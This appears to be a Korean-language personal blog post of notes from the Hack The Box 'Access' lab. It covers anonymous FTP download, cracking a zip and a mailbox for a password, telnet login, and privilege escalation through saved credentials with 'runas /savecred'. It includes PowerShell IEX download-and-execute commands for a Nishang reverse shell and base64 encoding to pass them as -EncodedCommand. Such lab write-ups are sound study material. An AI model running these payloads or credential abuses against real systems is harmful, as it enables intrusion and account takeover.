
[Windows] Access

우와해커 2020. 9. 26. 21:53


- MS Access DB읽어오는 방법

- tool설치하거나 칼리에 있는거 사용하거나

- 파워쉘 막혔을떄 어떻게 할지, StoredCredentials

root@kali:/HTB/Access# ftp

ftp> binary

ftp> get backup.mdb

ftp> get "Access Control.zip"

* wget을 사용해서 ftp 익명유저로 다운로드 가능함, 이방법이 ftp접근해서 get하는 것보다 편리함

wget -m ftp://anonymos:anonymous@

wget -m --no-passive ftp://anonymos:anonymous@

root@kali:/HTB/Access# file backup.mdb

root@kali:/HTB/Access# strings backup.mdb > backup.txt



root@kali:/HTB/Access# 7z x -paccess4u@security ac.zip 

root@kali:/HTB/Access# file 'Access Control.pst' 

Access Control.pst: Microsoft Outlook email folder (>=2003)

Hi there,


The password for the “security” account has been changed to 4Cc3ssC0ntr0ller.  Please ensure this is passed on to your engineers.




root@kali:/HTB/Access# telnet

login: security

password: 4Cc3ssC0ntr0ller


Microsoft Telnet Server.


C:\Users\security\Desktop>type user.txt



JAWS.ps1 Enumeration

> Stored Credential 취약점


or 파워쉘에서 아래 명령 실행

PS> cmdkey /list

User: Access\Administrator

Shotcut 찾기 명령어

PS> $WScript = New-Object -ComObject Wscript.Shell

PS> $shortcut = Get-ChildItem *.lnk

PS> $shortcut

PS> $WScript.CreateShortcut($shortcut)

니샹 리버스쉘로 관리자 로그인

PS> runas /user:Access\Administrator /savecred <실행할 명령>

PS> runas /user:ACCESS\Administrator /savecred "powershell -c IEX (New-Object


+TIP: Kali에서 파워쉘 명령 base64 인코딩해서 사용

echo -n "윈도에서 실행할 명령" | iconv --to-code UTF-16LE | base64 -w 0

Kali> echo -n "IEX (New-Object

Net.Webclient).downloadstring('')" | iconv --to-code UTF-16LE | base64 -w 0

PS> runas /user:ACCESS\Administrator /savecred "powershell -EncodedCommand "<base64>"

Typically "runas /savecred" is used to create a shortcut, which the user clicks to run the desired

application. The commands below are used to enumerate all the accessible shortcut (.lnk) files on

the system, and examine them for the presence of the "runas" command

> Get-ChildItem "C:\" *.lnk -Recurse -Force | ft fullname | Out-File shortcuts.txt

> ForEach ( $file in gc .\shortcuts.txt) { Write-Output $file ; gc $file | Select-String runas }

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